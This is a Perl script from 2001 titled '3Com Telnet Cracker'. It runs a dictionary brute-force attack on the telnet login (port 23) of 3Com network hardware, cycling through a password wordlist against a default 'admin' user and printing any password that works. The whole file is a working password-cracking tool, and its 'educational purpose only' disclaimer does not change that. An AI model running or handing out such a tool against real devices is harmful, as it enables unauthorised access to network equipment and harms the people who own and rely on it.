#!/usr/bin/perl -w
########################################################
# #
# 3Com Telnet Cracker v0.1b #
# ------------------------- #
# #
# Telnet implementation arcording to RFC 854 #
# #
# written 2001 by Siberian [www.sentry-labs.com] #
# #
# Tested with: #
# Active Perl (Windows NT) #
# Perl 5.stable (Slackware 3.6 & 7.1) #
# #
# This Software is published under GPL v2 #
# #
# FOR EDUCATIONAL PURPOUSE ONLY! #
# #
# SRL can't be held responsible for any damgae caused #
# by the software, direct or inderectly to anything #
# or anyone. #
# #
########################################################
use Socket;
sub guesspass {
$i=1;
$userh = $userf;
$userf = join '', $userf, chr(13), chr(10);
recv(SOCK,$ol,1,0);
while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
recv(SOCK,$ol,1,0);
}
while(defined($passwd = <FILE1>)) {
chop($passwd);
print ".";
while($i != 3) {
if($ol eq "L"){
send(SOCK,$userf,0);
}
if($ol eq "P") {
$passwd = join '', $passwd, chr(13), chr(10);
send(SOCK,$passwd,0);
}
recv(SOCK,$ol,1,0);
while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
recv(SOCK,$ol,1,0);
}
if($ol eq "M") {
print "\n\nPassword for $userh is $passwd\n";
exit 0;
}
$i++
}
$i=1;
}
print "\n\nIt's sad but true, you failed.\n";
}
print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n";
print "Get the latest Version at www.sentry-labs.com\n\n";
$remote = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$passf = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$userf = shift || ($userf = "admin");
$iaddr = inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iaddr);
$prot = getprotobyname('tcp');
socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!";
connect(SOCK, $paddr) || die "Can't connect to target host!";
open(FILE1, "$passf") || die "Can't open Password list!";
recv(SOCK,$ol,1,0);
$bs = join '', chr(10),chr(13),chr(10);
send(SOCK, $bs, 0);
guesspass();
close(FILE1);
close(SOCK);
exit 0;